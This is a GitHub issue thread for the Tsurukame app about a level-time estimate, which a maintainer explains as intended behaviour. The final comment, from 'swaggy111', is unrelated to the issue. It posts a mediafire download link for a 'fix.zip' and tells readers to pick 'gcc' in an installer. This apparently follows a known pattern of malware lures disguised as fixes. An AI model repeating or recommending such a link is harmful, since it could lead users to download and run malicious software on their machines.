### ISSUE TITLE
Incorrect remaining time for levels

### ISSUE THREAD

**Issue by azekyoo** [davidsansome/tsurukame#749]
The remaining time for each level is wrong until the radicals of the current level reach Guru stage. 

Basically, the remaining time of each level starts at around 11~13d (when it should be 6-7d), then after the 3d10h to make the new radicals reach Guru, it changes directly to the correct remaining time of 3d10h. 

Version 1.32.2.1064

**Comment by UInt2048** [comment]
This is expected behavior. Tsurukame will use your average level time as a substitute instead of the minimum level time for a more realistic estimate, because while it's possible you might actually complete a fast level in 3d 10h (displays as 3d 9h due to truncation), you probably won't be getting up at all hours to complete a slow level in 6d 20h, so your average completion time is more realistic.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."
